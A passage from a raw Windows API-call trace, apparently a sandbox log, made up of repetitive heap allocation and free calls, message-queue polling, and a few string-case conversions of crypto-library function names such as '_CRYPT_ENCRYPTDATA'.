Flags=0x0, Size=0x1ceb) returned 0x900190 [0192.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0192.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0192.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0192.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0192.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0192.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0192.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1ceb) returned 0x901e88 [0192.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900190 | out: hHeap=0x8a0000) returned 1 [0192.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0192.950] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0192.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0192.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0192.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0192.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0192.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1ceb) returned 0x900190 [0192.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0192.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900190 | out: hHeap=0x8a0000) returned 1 [0192.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0192.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0192.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0192.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0192.950] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0192.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0192.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0192.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0192.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0192.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0192.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0192.951] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0192.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0192.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0192.951] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0192.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0192.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0192.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27e8 [0192.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0192.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0192.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0192.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0192.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1ceb) returned 0x900190 [0192.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0192.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26d8 [0192.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0192.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0192.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0192.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2788 [0192.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0192.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0192.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0192.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2658 [0192.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0192.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0192.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0192.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9a90 [0192.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0192.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0192.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0192.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0192.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0192.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1ceb) returned 0x903b80 [0192.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0192.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0192.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0192.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0192.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0192.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0192.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0192.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0192.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0192.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0192.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0192.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0192.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0192.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0192.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0192.953] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0192.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0192.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0192.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0192.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0192.953] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0192.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0192.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0192.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0192.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0192.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0192.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0192.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0192.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0192.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0192.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0192.954] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0192.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0192.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0192.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0192.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2898 [0192.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0192.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0192.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0192.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0192.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9f0 [0192.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0192.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0192.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0192.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0192.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0192.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0192.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0192.954] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0192.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0192.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0192.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0192.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0192.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0192.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0192.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0192.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0192.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0192.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0192.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0192.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0192.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0192.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0192.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0192.955] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0192.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0192.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0192.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0192.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0192.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0192.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0192.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0192.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0192.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0192.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0192.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0192.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0192.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0192.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0192.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0192.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0192.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0192.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0192.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0192.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0192.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0192.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0192.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0192.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0192.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0192.956] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0192.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0192.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0192.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0192.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0192.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0192.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0192.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0192.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0192.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0192.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0192.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0192.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0192.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0192.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0192.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0192.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0192.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0192.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0192.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0192.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0192.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0192.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0192.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0192.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0192.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0192.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0192.957] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0192.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0192.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0192.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0192.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0192.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0192.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0192.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0192.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0192.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0192.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0192.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0192.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0192.958] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0192.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba018 [0192.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0192.958] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0192.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0192.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0192.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0192.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0192.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0192.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0192.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0192.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0192.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0192.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0192.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0192.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0192.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0192.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0192.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0192.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0192.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0192.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0192.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0192.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0192.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0192.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0192.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0192.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0192.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0192.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0192.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0192.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0192.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0192.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0192.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0192.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0192.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0192.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0192.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0192.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0192.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0192.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0192.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 